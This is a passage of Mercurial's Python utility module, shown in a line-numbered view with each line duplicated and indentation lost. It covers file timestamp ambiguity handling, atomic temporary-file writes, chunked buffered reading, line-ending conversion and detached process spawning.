2249 Case (*2) above means that a file was changed twice or more at
2250 same time in sec (= S[n-1].ctime), and comparison of timestamp
2250 same time in sec (= S[n-1].ctime), and comparison of timestamp
2251 is ambiguous.
2251 is ambiguous.
2252
2252
2253 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2253 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
2254 timestamp is ambiguous".
2254 timestamp is ambiguous".
2255
2255
2256 But advancing mtime only in case (*2) doesn't work as
2256 But advancing mtime only in case (*2) doesn't work as
2257 expected, because naturally advanced S[n].mtime in case (*1)
2257 expected, because naturally advanced S[n].mtime in case (*1)
2258 might be equal to manually advanced S[n-1 or earlier].mtime.
2258 might be equal to manually advanced S[n-1 or earlier].mtime.
2259
2259
2260 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2260 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2261 treated as ambiguous regardless of mtime, to avoid overlooking
2261 treated as ambiguous regardless of mtime, to avoid overlooking
2262 by confliction between such mtime.
2262 by confliction between such mtime.
2263
2263
2264 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2264 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2265 S[n].mtime", even if size of a file isn't changed.
2265 S[n].mtime", even if size of a file isn't changed.
2266 """
2266 """
2267 try:
2267 try:
2268 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2268 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2269 except AttributeError:
2269 except AttributeError:
2270 return False
2270 return False
2271
2271
2272 def avoidambig(self, path, old):
2272 def avoidambig(self, path, old):
2273 """Change file stat of specified path to avoid ambiguity
2273 """Change file stat of specified path to avoid ambiguity
2274
2274
2275 'old' should be previous filestat of 'path'.
2275 'old' should be previous filestat of 'path'.
2276
2276
2277 This skips avoiding ambiguity, if a process doesn't have
2277 This skips avoiding ambiguity, if a process doesn't have
2278 appropriate privileges for 'path'. This returns False in this
2278 appropriate privileges for 'path'. This returns False in this
2279 case.
2279 case.
2280
2280
2281 Otherwise, this returns True, as "ambiguity is avoided".
2281 Otherwise, this returns True, as "ambiguity is avoided".
2282 """
2282 """
2283 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2283 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2284 try:
2284 try:
2285 os.utime(path, (advanced, advanced))
2285 os.utime(path, (advanced, advanced))
2286 except OSError as inst:
2286 except OSError as inst:
2287 if inst.errno == errno.EPERM:
2287 if inst.errno == errno.EPERM:
2288 # utime() on the file created by another user causes EPERM,
2288 # utime() on the file created by another user causes EPERM,
2289 # if a process doesn't have appropriate privileges
2289 # if a process doesn't have appropriate privileges
2290 return False
2290 return False
2291 raise
2291 raise
2292 return True
2292 return True
2293
2293
2294 def __ne__(self, other):
2294 def __ne__(self, other):
2295 return not self == other
2295 return not self == other
2296
2296
2297 class atomictempfile(object):
2297 class atomictempfile(object):
2298 '''writable file object that atomically updates a file
2298 '''writable file object that atomically updates a file
2299
2299
2300 All writes will go to a temporary copy of the original file. Call
2300 All writes will go to a temporary copy of the original file. Call
2301 close() when you are done writing, and atomictempfile will rename
2301 close() when you are done writing, and atomictempfile will rename
2302 the temporary copy to the original name, making the changes
2302 the temporary copy to the original name, making the changes
2303 visible. If the object is destroyed without being closed, all your
2303 visible. If the object is destroyed without being closed, all your
2304 writes are discarded.
2304 writes are discarded.
2305
2305
2306 checkambig argument of constructor is used with filestat, and is
2306 checkambig argument of constructor is used with filestat, and is
2307 useful only if target file is guarded by any lock (e.g. repo.lock
2307 useful only if target file is guarded by any lock (e.g. repo.lock
2308 or repo.wlock).
2308 or repo.wlock).
2309 '''
2309 '''
2310 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2310 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2311 self.__name = name # permanent name
2311 self.__name = name # permanent name
2312 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2312 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2313 createmode=createmode)
2313 createmode=createmode)
2314 self._fp = posixfile(self._tempname, mode)
2314 self._fp = posixfile(self._tempname, mode)
2315 self._checkambig = checkambig
2315 self._checkambig = checkambig
2316
2316
2317 # delegated methods
2317 # delegated methods
2318 self.read = self._fp.read
2318 self.read = self._fp.read
2319 self.write = self._fp.write
2319 self.write = self._fp.write
2320 self.seek = self._fp.seek
2320 self.seek = self._fp.seek
2321 self.tell = self._fp.tell
2321 self.tell = self._fp.tell
2322 self.fileno = self._fp.fileno
2322 self.fileno = self._fp.fileno
2323
2323
2324 def close(self):
2324 def close(self):
2325 if not self._fp.closed:
2325 if not self._fp.closed:
2326 self._fp.close()
2326 self._fp.close()
2327 filename = localpath(self.__name)
2327 filename = localpath(self.__name)
2328 oldstat = self._checkambig and filestat.frompath(filename)
2328 oldstat = self._checkambig and filestat.frompath(filename)
2329 if oldstat and oldstat.stat:
2329 if oldstat and oldstat.stat:
2330 rename(self._tempname, filename)
2330 rename(self._tempname, filename)
2331 newstat = filestat.frompath(filename)
2331 newstat = filestat.frompath(filename)
2332 if newstat.isambig(oldstat):
2332 if newstat.isambig(oldstat):
2333 # stat of changed file is ambiguous to original one
2333 # stat of changed file is ambiguous to original one
2334 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2334 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2335 os.utime(filename, (advanced, advanced))
2335 os.utime(filename, (advanced, advanced))
2336 else:
2336 else:
2337 rename(self._tempname, filename)
2337 rename(self._tempname, filename)
2338
2338
2339 def discard(self):
2339 def discard(self):
2340 if not self._fp.closed:
2340 if not self._fp.closed:
2341 try:
2341 try:
2342 os.unlink(self._tempname)
2342 os.unlink(self._tempname)
2343 except OSError:
2343 except OSError:
2344 pass
2344 pass
2345 self._fp.close()
2345 self._fp.close()
2346
2346
2347 def __del__(self):
2347 def __del__(self):
2348 if safehasattr(self, '_fp'): # constructor actually did something
2348 if safehasattr(self, '_fp'): # constructor actually did something
2349 self.discard()
2349 self.discard()
2350
2350
2351 def __enter__(self):
2351 def __enter__(self):
2352 return self
2352 return self
2353
2353
2354 def __exit__(self, exctype, excvalue, traceback):
2354 def __exit__(self, exctype, excvalue, traceback):
2355 if exctype is not None:
2355 if exctype is not None:
2356 self.discard()
2356 self.discard()
2357 else:
2357 else:
2358 self.close()
2358 self.close()
2359
2359
2360 def unlinkpath(f, ignoremissing=False):
2360 def unlinkpath(f, ignoremissing=False):
2361 """unlink and remove the directory if it is empty"""
2361 """unlink and remove the directory if it is empty"""
2362 if ignoremissing:
2362 if ignoremissing:
2363 tryunlink(f)
2363 tryunlink(f)
2364 else:
2364 else:
2365 unlink(f)
2365 unlink(f)
2366 # try removing directories that might now be empty
2366 # try removing directories that might now be empty
2367 try:
2367 try:
2368 removedirs(os.path.dirname(f))
2368 removedirs(os.path.dirname(f))
2369 except OSError:
2369 except OSError:
2370 pass
2370 pass
2371
2371
2372 def tryunlink(f):
2372 def tryunlink(f):
2373 """Attempt to remove a file, ignoring ENOENT errors."""
2373 """Attempt to remove a file, ignoring ENOENT errors."""
2374 try:
2374 try:
2375 unlink(f)
2375 unlink(f)
2376 except OSError as e:
2376 except OSError as e:
2377 if e.errno != errno.ENOENT:
2377 if e.errno != errno.ENOENT:
2378 raise
2378 raise
2379
2379
2380 def makedirs(name, mode=None, notindexed=False):
2380 def makedirs(name, mode=None, notindexed=False):
2381 """recursive directory creation with parent mode inheritance
2381 """recursive directory creation with parent mode inheritance
2382
2382
2383 Newly created directories are marked as "not to be indexed by
2383 Newly created directories are marked as "not to be indexed by
2384 the content indexing service", if ``notindexed`` is specified
2384 the content indexing service", if ``notindexed`` is specified
2385 for "write" mode access.
2385 for "write" mode access.
2386 """
2386 """
2387 try:
2387 try:
2388 makedir(name, notindexed)
2388 makedir(name, notindexed)
2389 except OSError as err:
2389 except OSError as err:
2390 if err.errno == errno.EEXIST:
2390 if err.errno == errno.EEXIST:
2391 return
2391 return
2392 if err.errno != errno.ENOENT or not name:
2392 if err.errno != errno.ENOENT or not name:
2393 raise
2393 raise
2394 parent = os.path.dirname(os.path.abspath(name))
2394 parent = os.path.dirname(os.path.abspath(name))
2395 if parent == name:
2395 if parent == name:
2396 raise
2396 raise
2397 makedirs(parent, mode, notindexed)
2397 makedirs(parent, mode, notindexed)
2398 try:
2398 try:
2399 makedir(name, notindexed)
2399 makedir(name, notindexed)
2400 except OSError as err:
2400 except OSError as err:
2401 # Catch EEXIST to handle races
2401 # Catch EEXIST to handle races
2402 if err.errno == errno.EEXIST:
2402 if err.errno == errno.EEXIST:
2403 return
2403 return
2404 raise
2404 raise
2405 if mode is not None:
2405 if mode is not None:
2406 os.chmod(name, mode)
2406 os.chmod(name, mode)
2407
2407
2408 def readfile(path):
2408 def readfile(path):
2409 with open(path, 'rb') as fp:
2409 with open(path, 'rb') as fp:
2410 return fp.read()
2410 return fp.read()
2411
2411
2412 def writefile(path, text):
2412 def writefile(path, text):
2413 with open(path, 'wb') as fp:
2413 with open(path, 'wb') as fp:
2414 fp.write(text)
2414 fp.write(text)
2415
2415
2416 def appendfile(path, text):
2416 def appendfile(path, text):
2417 with open(path, 'ab') as fp:
2417 with open(path, 'ab') as fp:
2418 fp.write(text)
2418 fp.write(text)
2419
2419
2420 class chunkbuffer(object):
2420 class chunkbuffer(object):
2421 """Allow arbitrary sized chunks of data to be efficiently read from an
2421 """Allow arbitrary sized chunks of data to be efficiently read from an
2422 iterator over chunks of arbitrary size."""
2422 iterator over chunks of arbitrary size."""
2423
2423
2424 def __init__(self, in_iter):
2424 def __init__(self, in_iter):
2425 """in_iter is the iterator that's iterating over the input chunks."""
2425 """in_iter is the iterator that's iterating over the input chunks."""
2426 def splitbig(chunks):
2426 def splitbig(chunks):
2427 for chunk in chunks:
2427 for chunk in chunks:
2428 if len(chunk) > 2**20:
2428 if len(chunk) > 2**20:
2429 pos = 0
2429 pos = 0
2430 while pos < len(chunk):
2430 while pos < len(chunk):
2431 end = pos + 2 ** 18
2431 end = pos + 2 ** 18
2432 yield chunk[pos:end]
2432 yield chunk[pos:end]
2433 pos = end
2433 pos = end
2434 else:
2434 else:
2435 yield chunk
2435 yield chunk
2436 self.iter = splitbig(in_iter)
2436 self.iter = splitbig(in_iter)
2437 self._queue = collections.deque()
2437 self._queue = collections.deque()
2438 self._chunkoffset = 0
2438 self._chunkoffset = 0
2439
2439
2440 def read(self, l=None):
2440 def read(self, l=None):
2441 """Read L bytes of data from the iterator of chunks of data.
2441 """Read L bytes of data from the iterator of chunks of data.
2442 Returns less than L bytes if the iterator runs dry.
2442 Returns less than L bytes if the iterator runs dry.
2443
2443
2444 If size parameter is omitted, read everything"""
2444 If size parameter is omitted, read everything"""
2445 if l is None:
2445 if l is None:
2446 return ''.join(self.iter)
2446 return ''.join(self.iter)
2447
2447
2448 left = l
2448 left = l
2449 buf = []
2449 buf = []
2450 queue = self._queue
2450 queue = self._queue
2451 while left > 0:
2451 while left > 0:
2452 # refill the queue
2452 # refill the queue
2453 if not queue:
2453 if not queue:
2454 target = 2**18
2454 target = 2**18
2455 for chunk in self.iter:
2455 for chunk in self.iter:
2456 queue.append(chunk)
2456 queue.append(chunk)
2457 target -= len(chunk)
2457 target -= len(chunk)
2458 if target <= 0:
2458 if target <= 0:
2459 break
2459 break
2460 if not queue:
2460 if not queue:
2461 break
2461 break
2462
2462
2463 # The easy way to do this would be to queue.popleft(), modify the
2463 # The easy way to do this would be to queue.popleft(), modify the
2464 # chunk (if necessary), then queue.appendleft(). However, for cases
2464 # chunk (if necessary), then queue.appendleft(). However, for cases
2465 # where we read partial chunk content, this incurs 2 dequeue
2465 # where we read partial chunk content, this incurs 2 dequeue
2466 # mutations and creates a new str for the remaining chunk in the
2466 # mutations and creates a new str for the remaining chunk in the
2467 # queue. Our code below avoids this overhead.
2467 # queue. Our code below avoids this overhead.
2468
2468
2469 chunk = queue[0]
2469 chunk = queue[0]
2470 chunkl = len(chunk)
2470 chunkl = len(chunk)
2471 offset = self._chunkoffset
2471 offset = self._chunkoffset
2472
2472
2473 # Use full chunk.
2473 # Use full chunk.
2474 if offset == 0 and left >= chunkl:
2474 if offset == 0 and left >= chunkl:
2475 left -= chunkl
2475 left -= chunkl
2476 queue.popleft()
2476 queue.popleft()
2477 buf.append(chunk)
2477 buf.append(chunk)
2478 # self._chunkoffset remains at 0.
2478 # self._chunkoffset remains at 0.
2479 continue
2479 continue
2480
2480
2481 chunkremaining = chunkl - offset
2481 chunkremaining = chunkl - offset
2482
2482
2483 # Use all of unconsumed part of chunk.
2483 # Use all of unconsumed part of chunk.
2484 if left >= chunkremaining:
2484 if left >= chunkremaining:
2485 left -= chunkremaining
2485 left -= chunkremaining
2486 queue.popleft()
2486 queue.popleft()
2487 # offset == 0 is enabled by block above, so this won't merely
2487 # offset == 0 is enabled by block above, so this won't merely
2488 # copy via ``chunk[0:]``.
2488 # copy via ``chunk[0:]``.
2489 buf.append(chunk[offset:])
2489 buf.append(chunk[offset:])
2490 self._chunkoffset = 0
2490 self._chunkoffset = 0
2491
2491
2492 # Partial chunk needed.
2492 # Partial chunk needed.
2493 else:
2493 else:
2494 buf.append(chunk[offset:offset + left])
2494 buf.append(chunk[offset:offset + left])
2495 self._chunkoffset += left
2495 self._chunkoffset += left
2496 left -= chunkremaining
2496 left -= chunkremaining
2497
2497
2498 return ''.join(buf)
2498 return ''.join(buf)
2499
2499
2500 def filechunkiter(f, size=131072, limit=None):
2500 def filechunkiter(f, size=131072, limit=None):
2501 """Create a generator that produces the data in the file size
2501 """Create a generator that produces the data in the file size
2502 (default 131072) bytes at a time, up to optional limit (default is
2502 (default 131072) bytes at a time, up to optional limit (default is
2503 to read all data). Chunks may be less than size bytes if the
2503 to read all data). Chunks may be less than size bytes if the
2504 chunk is the last chunk in the file, or the file is a socket or
2504 chunk is the last chunk in the file, or the file is a socket or
2505 some other type of file that sometimes reads less data than is
2505 some other type of file that sometimes reads less data than is
2506 requested."""
2506 requested."""
2507 assert size >= 0
2507 assert size >= 0
2508 assert limit is None or limit >= 0
2508 assert limit is None or limit >= 0
2509 while True:
2509 while True:
2510 if limit is None:
2510 if limit is None:
2511 nbytes = size
2511 nbytes = size
2512 else:
2512 else:
2513 nbytes = min(limit, size)
2513 nbytes = min(limit, size)
2514 s = nbytes and f.read(nbytes)
2514 s = nbytes and f.read(nbytes)
2515 if not s:
2515 if not s:
2516 break
2516 break
2517 if limit:
2517 if limit:
2518 limit -= len(s)
2518 limit -= len(s)
2519 yield s
2519 yield s
2520
2520
2521 class cappedreader(object):
2521 class cappedreader(object):
2522 """A file object proxy that allows reading up to N bytes.
2522 """A file object proxy that allows reading up to N bytes.
2523
2523
2524 Given a source file object, instances of this type allow reading up to
2524 Given a source file object, instances of this type allow reading up to
2525 N bytes from that source file object. Attempts to read past the allowed
2525 N bytes from that source file object. Attempts to read past the allowed
2526 limit are treated as EOF.
2526 limit are treated as EOF.
2527
2527
2528 It is assumed that I/O is not performed on the original file object
2528 It is assumed that I/O is not performed on the original file object
2529 in addition to I/O that is performed by this instance. If there is,
2529 in addition to I/O that is performed by this instance. If there is,
2530 state tracking will get out of sync and unexpected results will ensue.
2530 state tracking will get out of sync and unexpected results will ensue.
2531 """
2531 """
2532 def __init__(self, fh, limit):
2532 def __init__(self, fh, limit):
2533 """Allow reading up to <limit> bytes from <fh>."""
2533 """Allow reading up to <limit> bytes from <fh>."""
2534 self._fh = fh
2534 self._fh = fh
2535 self._left = limit
2535 self._left = limit
2536
2536
2537 def read(self, n=-1):
2537 def read(self, n=-1):
2538 if not self._left:
2538 if not self._left:
2539 return b''
2539 return b''
2540
2540
2541 if n < 0:
2541 if n < 0:
2542 n = self._left
2542 n = self._left
2543
2543
2544 data = self._fh.read(min(n, self._left))
2544 data = self._fh.read(min(n, self._left))
2545 self._left -= len(data)
2545 self._left -= len(data)
2546 assert self._left >= 0
2546 assert self._left >= 0
2547
2547
2548 return data
2548 return data
2549
2549
2550 def readinto(self, b):
2550 def readinto(self, b):
2551 res = self.read(len(b))
2551 res = self.read(len(b))
2552 if res is None:
2552 if res is None:
2553 return None
2553 return None
2554
2554
2555 b[0:len(res)] = res
2555 b[0:len(res)] = res
2556 return len(res)
2556 return len(res)
2557
2557
2558 def unitcountfn(*unittable):
2558 def unitcountfn(*unittable):
2559 '''return a function that renders a readable count of some quantity'''
2559 '''return a function that renders a readable count of some quantity'''
2560
2560
2561 def go(count):
2561 def go(count):
2562 for multiplier, divisor, format in unittable:
2562 for multiplier, divisor, format in unittable:
2563 if abs(count) >= divisor * multiplier:
2563 if abs(count) >= divisor * multiplier:
2564 return format % (count / float(divisor))
2564 return format % (count / float(divisor))
2565 return unittable[-1][2] % count
2565 return unittable[-1][2] % count
2566
2566
2567 return go
2567 return go
2568
2568
2569 def processlinerange(fromline, toline):
2569 def processlinerange(fromline, toline):
2570 """Check that linerange <fromline>:<toline> makes sense and return a
2570 """Check that linerange <fromline>:<toline> makes sense and return a
2571 0-based range.
2571 0-based range.
2572
2572
2573 >>> processlinerange(10, 20)
2573 >>> processlinerange(10, 20)
2574 (9, 20)
2574 (9, 20)
2575 >>> processlinerange(2, 1)
2575 >>> processlinerange(2, 1)
2576 Traceback (most recent call last):
2576 Traceback (most recent call last):
2577 ...
2577 ...
2578 ParseError: line range must be positive
2578 ParseError: line range must be positive
2579 >>> processlinerange(0, 5)
2579 >>> processlinerange(0, 5)
2580 Traceback (most recent call last):
2580 Traceback (most recent call last):
2581 ...
2581 ...
2582 ParseError: fromline must be strictly positive
2582 ParseError: fromline must be strictly positive
2583 """
2583 """
2584 if toline - fromline < 0:
2584 if toline - fromline < 0:
2585 raise error.ParseError(_("line range must be positive"))
2585 raise error.ParseError(_("line range must be positive"))
2586 if fromline < 1:
2586 if fromline < 1:
2587 raise error.ParseError(_("fromline must be strictly positive"))
2587 raise error.ParseError(_("fromline must be strictly positive"))
2588 return fromline - 1, toline
2588 return fromline - 1, toline
2589
2589
2590 bytecount = unitcountfn(
2590 bytecount = unitcountfn(
2591 (100, 1 << 30, _('%.0f GB')),
2591 (100, 1 << 30, _('%.0f GB')),
2592 (10, 1 << 30, _('%.1f GB')),
2592 (10, 1 << 30, _('%.1f GB')),
2593 (1, 1 << 30, _('%.2f GB')),
2593 (1, 1 << 30, _('%.2f GB')),
2594 (100, 1 << 20, _('%.0f MB')),
2594 (100, 1 << 20, _('%.0f MB')),
2595 (10, 1 << 20, _('%.1f MB')),
2595 (10, 1 << 20, _('%.1f MB')),
2596 (1, 1 << 20, _('%.2f MB')),
2596 (1, 1 << 20, _('%.2f MB')),
2597 (100, 1 << 10, _('%.0f KB')),
2597 (100, 1 << 10, _('%.0f KB')),
2598 (10, 1 << 10, _('%.1f KB')),
2598 (10, 1 << 10, _('%.1f KB')),
2599 (1, 1 << 10, _('%.2f KB')),
2599 (1, 1 << 10, _('%.2f KB')),
2600 (1, 1, _('%.0f bytes')),
2600 (1, 1, _('%.0f bytes')),
2601 )
2601 )
2602
2602
2603 class transformingwriter(object):
2603 class transformingwriter(object):
2604 """Writable file wrapper to transform data by function"""
2604 """Writable file wrapper to transform data by function"""
2605
2605
2606 def __init__(self, fp, encode):
2606 def __init__(self, fp, encode):
2607 self._fp = fp
2607 self._fp = fp
2608 self._encode = encode
2608 self._encode = encode
2609
2609
2610 def close(self):
2610 def close(self):
2611 self._fp.close()
2611 self._fp.close()
2612
2612
2613 def flush(self):
2613 def flush(self):
2614 self._fp.flush()
2614 self._fp.flush()
2615
2615
2616 def write(self, data):
2616 def write(self, data):
2617 return self._fp.write(self._encode(data))
2617 return self._fp.write(self._encode(data))
2618
2618
2619 # Matches a single EOL which can either be a CRLF where repeated CR
2619 # Matches a single EOL which can either be a CRLF where repeated CR
2620 # are removed or a LF. We do not care about old Macintosh files, so a
2620 # are removed or a LF. We do not care about old Macintosh files, so a
2621 # stray CR is an error.
2621 # stray CR is an error.
2622 _eolre = remod.compile(br'\r*\n')
2622 _eolre = remod.compile(br'\r*\n')
2623
2623
2624 def tolf(s):
2624 def tolf(s):
2625 return _eolre.sub('\n', s)
2625 return _eolre.sub('\n', s)
2626
2626
2627 def tocrlf(s):
2627 def tocrlf(s):
2628 return _eolre.sub('\r\n', s)
2628 return _eolre.sub('\r\n', s)
2629
2629
2630 def _crlfwriter(fp):
2630 def _crlfwriter(fp):
2631 return transformingwriter(fp, tocrlf)
2631 return transformingwriter(fp, tocrlf)
2632
2632
2633 if pycompat.oslinesep == '\r\n':
2633 if pycompat.oslinesep == '\r\n':
2634 tonativeeol = tocrlf
2634 tonativeeol = tocrlf
2635 fromnativeeol = tolf
2635 fromnativeeol = tolf
2636 nativeeolwriter = _crlfwriter
2636 nativeeolwriter = _crlfwriter
2637 else:
2637 else:
2638 tonativeeol = pycompat.identity
2638 tonativeeol = pycompat.identity
2639 fromnativeeol = pycompat.identity
2639 fromnativeeol = pycompat.identity
2640 nativeeolwriter = pycompat.identity
2640 nativeeolwriter = pycompat.identity
2641
2641
2642 if (pyplatform.python_implementation() == 'CPython' and
2642 if (pyplatform.python_implementation() == 'CPython' and
2643 sys.version_info < (3, 0)):
2643 sys.version_info < (3, 0)):
2644 # There is an issue in CPython that some IO methods do not handle EINTR
2644 # There is an issue in CPython that some IO methods do not handle EINTR
2645 # correctly. The following table shows what CPython version (and functions)
2645 # correctly. The following table shows what CPython version (and functions)
2646 # are affected (buggy: has the EINTR bug, okay: otherwise):
2646 # are affected (buggy: has the EINTR bug, okay: otherwise):
2647 #
2647 #
2648 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2648 # | < 2.7.4 | 2.7.4 to 2.7.12 | >= 3.0
2649 # --------------------------------------------------
2649 # --------------------------------------------------
2650 # fp.__iter__ | buggy | buggy | okay
2650 # fp.__iter__ | buggy | buggy | okay
2651 # fp.read* | buggy | okay [1] | okay
2651 # fp.read* | buggy | okay [1] | okay
2652 #
2652 #
2653 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2653 # [1]: fixed by changeset 67dc99a989cd in the cpython hg repo.
2654 #
2654 #
2655 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2655 # Here we workaround the EINTR issue for fileobj.__iter__. Other methods
2656 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2656 # like "read*" are ignored for now, as Python < 2.7.4 is a minority.
2657 #
2657 #
2658 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2658 # Although we can workaround the EINTR issue for fp.__iter__, it is slower:
2659 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2659 # "for x in fp" is 4x faster than "for x in iter(fp.readline, '')" in
2660 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2660 # CPython 2, because CPython 2 maintains an internal readahead buffer for
2661 # fp.__iter__ but not other fp.read* methods.
2661 # fp.__iter__ but not other fp.read* methods.
2662 #
2662 #
2663 # On modern systems like Linux, the "read" syscall cannot be interrupted
2663 # On modern systems like Linux, the "read" syscall cannot be interrupted
2664 # when reading "fast" files like on-disk files. So the EINTR issue only
2664 # when reading "fast" files like on-disk files. So the EINTR issue only
2665 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2665 # affects things like pipes, sockets, ttys etc. We treat "normal" (S_ISREG)
2666 # files approximately as "fast" files and use the fast (unsafe) code path,
2666 # files approximately as "fast" files and use the fast (unsafe) code path,
2667 # to minimize the performance impact.
2667 # to minimize the performance impact.
2668 if sys.version_info >= (2, 7, 4):
2668 if sys.version_info >= (2, 7, 4):
2669 # fp.readline deals with EINTR correctly, use it as a workaround.
2669 # fp.readline deals with EINTR correctly, use it as a workaround.
2670 def _safeiterfile(fp):
2670 def _safeiterfile(fp):
2671 return iter(fp.readline, '')
2671 return iter(fp.readline, '')
2672 else:
2672 else:
2673 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2673 # fp.read* are broken too, manually deal with EINTR in a stupid way.
2674 # note: this may block longer than necessary because of bufsize.
2674 # note: this may block longer than necessary because of bufsize.
2675 def _safeiterfile(fp, bufsize=4096):
2675 def _safeiterfile(fp, bufsize=4096):
2676 fd = fp.fileno()
2676 fd = fp.fileno()
2677 line = ''
2677 line = ''
2678 while True:
2678 while True:
2679 try:
2679 try:
2680 buf = os.read(fd, bufsize)
2680 buf = os.read(fd, bufsize)
2681 except OSError as ex:
2681 except OSError as ex:
2682 # os.read only raises EINTR before any data is read
2682 # os.read only raises EINTR before any data is read
2683 if ex.errno == errno.EINTR:
2683 if ex.errno == errno.EINTR:
2684 continue
2684 continue
2685 else:
2685 else:
2686 raise
2686 raise
2687 line += buf
2687 line += buf
2688 if '\n' in buf:
2688 if '\n' in buf:
2689 splitted = line.splitlines(True)
2689 splitted = line.splitlines(True)
2690 line = ''
2690 line = ''
2691 for l in splitted:
2691 for l in splitted:
2692 if l[-1] == '\n':
2692 if l[-1] == '\n':
2693 yield l
2693 yield l
2694 else:
2694 else:
2695 line = l
2695 line = l
2696 if not buf:
2696 if not buf:
2697 break
2697 break
2698 if line:
2698 if line:
2699 yield line
2699 yield line
2700
2700
2701 def iterfile(fp):
2701 def iterfile(fp):
2702 fastpath = True
2702 fastpath = True
2703 if type(fp) is file:
2703 if type(fp) is file:
2704 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2704 fastpath = stat.S_ISREG(os.fstat(fp.fileno()).st_mode)
2705 if fastpath:
2705 if fastpath:
2706 return fp
2706 return fp
2707 else:
2707 else:
2708 return _safeiterfile(fp)
2708 return _safeiterfile(fp)
2709 else:
2709 else:
2710 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2710 # PyPy and CPython 3 do not have the EINTR issue thus no workaround needed.
2711 def iterfile(fp):
2711 def iterfile(fp):
2712 return fp
2712 return fp
2713
2713
2714 def iterlines(iterator):
2714 def iterlines(iterator):
2715 for chunk in iterator:
2715 for chunk in iterator:
2716 for line in chunk.splitlines():
2716 for line in chunk.splitlines():
2717 yield line
2717 yield line
2718
2718
2719 def expandpath(path):
2719 def expandpath(path):
2720 return os.path.expanduser(os.path.expandvars(path))
2720 return os.path.expanduser(os.path.expandvars(path))
2721
2721
2722 def hgcmd():
2722 def hgcmd():
2723 """Return the command used to execute current hg
2723 """Return the command used to execute current hg
2724
2724
2725 This is different from hgexecutable() because on Windows we want
2725 This is different from hgexecutable() because on Windows we want
2726 to avoid things opening new shell windows like batch files, so we
2726 to avoid things opening new shell windows like batch files, so we
2727 get either the python call or current executable.
2727 get either the python call or current executable.
2728 """
2728 """
2729 if mainfrozen():
2729 if mainfrozen():
2730 if getattr(sys, 'frozen', None) == 'macosx_app':
2730 if getattr(sys, 'frozen', None) == 'macosx_app':
2731 # Env variable set by py2app
2731 # Env variable set by py2app
2732 return [encoding.environ['EXECUTABLEPATH']]
2732 return [encoding.environ['EXECUTABLEPATH']]
2733 else:
2733 else:
2734 return [pycompat.sysexecutable]
2734 return [pycompat.sysexecutable]
2735 return gethgcmd()
2735 return gethgcmd()
2736
2736
2737 def rundetached(args, condfn):
2737 def rundetached(args, condfn):
2738 """Execute the argument list in a detached process.
2738 """Execute the argument list in a detached process.
2739
2739
2740 condfn is a callable which is called repeatedly and should return
2740 condfn is a callable which is called repeatedly and should return
2741 True once the child process is known to have started successfully.
2741 True once the child process is known to have started successfully.
2742 At this point, the child process PID is returned. If the child
2742 At this point, the child process PID is returned. If the child
2743 process fails to start or finishes before condfn() evaluates to
2743 process fails to start or finishes before condfn() evaluates to
2744 True, return -1.
2744 True, return -1.
2745 """
2745 """
2746 # Windows case is easier because the child process is either
2746 # Windows case is easier because the child process is either
2747 # successfully starting and validating the condition or exiting
2747 # successfully starting and validating the condition or exiting
2748 # on failure. We just poll on its PID. On Unix, if the child
2748 # on failure. We just poll on its PID. On Unix, if the child
2749 # process fails to start, it will be left in a zombie state until
2749 # process fails to start, it will be left in a zombie state until
2750 # the parent wait on it, which we cannot do since we expect a long
2750 # the parent wait on it, which we cannot do since we expect a long
2751 # running process on success. Instead we listen for SIGCHLD telling
2751 # running process on success. Instead we listen for SIGCHLD telling
2752 # us our child process terminated.
2752 # us our child process terminated.
2753 terminated = set()
2753 terminated = set()
2754 def handler(signum, frame):
2754 def handler(signum, frame):
2755 terminated.add(os.wait())
2755 terminated.add(os.wait())
2756 prevhandler = None
2756 prevhandler = None
2757 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2757 SIGCHLD = getattr(signal, 'SIGCHLD', None)
2758 if SIGCHLD is not None:
2758 if SIGCHLD is not None:
2759 prevhandler = signal.signal(SIGCHLD, handler)
2759 prevhandler = signal.signal(SIGCHLD, handler)
2760 try:
2760 try:
2761 pid = spawndetached(args)
2761 pid = spawndetached(args)
2762 while not condfn():
2762 while not condfn():
2763 if ((pid in terminated or not testpid(pid))
2763 if ((pid in terminated or not testpid(pid))
2764 and not condfn()):
2764 and not condfn()):
2765 return -1
2765 return -1
2766 time.sleep(0.1)
2766 time.sleep(0.1)
2767 return pid
2767 return pid
2768 finally:
2768 finally:
2769 if prevhandler is not None:
2769 if prevhandler is not None:
2770 signal.signal(signal.SIGCHLD, prevhandler)
2770 signal.signal(signal.SIGCHLD, prevhandler)
2771
2771
2772 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2772 def interpolate(prefix, mapping, s, fn=None, escape_prefix=False):
2773 """Return the result of interpolating items in the mapping into string s.
2773 """Return the result of interpolating items in the mapping into string s.
2774
2774
2775 prefix is a single character string, or a two character string with
2775 prefix is a single character string, or a two character string with
2776 a backslash as the first character if the prefix needs to be escaped in
2776 a backslash as the first character if the prefix needs to be escaped in
